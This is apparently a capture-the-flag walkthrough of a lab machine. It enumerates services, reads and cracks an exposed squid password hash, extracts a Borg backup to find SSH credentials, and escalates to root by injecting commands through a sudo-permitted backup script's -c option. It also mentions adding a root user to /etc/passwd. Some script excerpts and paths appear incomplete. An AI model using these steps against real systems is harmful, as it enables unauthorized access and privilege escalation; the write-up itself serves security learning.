sudo nmap -p- -sS -sV


22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Default root page for the web server points to the Apache2 page.

We can then use feroxbuster to enumerate further directories and files.

feroxbuster -u <IP> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

From the results above the /etc/squid/passwd is potentially interesting. Using curl we can read the contents of the file from the terminal.

curl http://<IP>/etc/squid/passwd

Reveals the user and hash combination: music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

This was then cracked using John against the rockyou.txt wordlist.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt   

For now, we can keep a note of the cracked password. Looking again at the feroxbuster results we can browse to http://<IP>/admin which shows the web page below.

Under the Archive drop down menu there is an opporunity to download a archive.tar compressed archive. This archive is extractable without providing a password.

The archive extracts down into the path: home/field/dev/final_archive/

Looking through the files README.txt gives indication that the archive was created with Borg Backup.

The command below will install Borg Backup.

sudo apt-get install borgbackup

Shown below are the commands and linked documentation for listing and extract Borg archives. As shown in the second command the archive can be extract with Borg, where we will be prompted to provide password authentication to decrypt and extract the archive.

borg list ~/Downloads/home/field/dev/final_archive 

borg extract ~/Downloads/home/field/dev/final_archive/::music_archive

After entering the cracked password from earlier, the command below can be used to find interesting files within the newly extract archive which appears to represent the user profile for the user alex.

find ~/Desktop/home -name *.txt 

The note.txt file in Alex's documents reveals a password for his SSH login.

After successfully logging in with SSH we are able to check what sudo permissions Alex has on the target system.

Checking sudo -l.

Alex has the ability to run sudo as any user without providing a password on the bash script /etc/mp3backups/


sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

#while IFS= read -r line
#  b=$(basename $input)
#  echo "$line"
#done < "$input"

while getopts c: flag
        case "${flag}" in 
                c) command=${OPTARG};;

backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.

# Create archive filename.
hostname=$(hostname -s)

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"


# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo "Backup finished"

echo $cmd

There is an opportunity to run commands at the end of the script.

echo $cmd

Running a command after the script using the -c parameter allows commands to be executed in the context of root.

reading the contents of /home/alex/.bash_history also shows where the user alex has used the same methods previously to perform elevated functions with the script.

sudo /etc/mp3backups/ -c "cat /root/root.txt"

This allows for the root flag to be read.

For a root shell its possible to use this function to echo in a new root user into /etc/passwd.

Last updated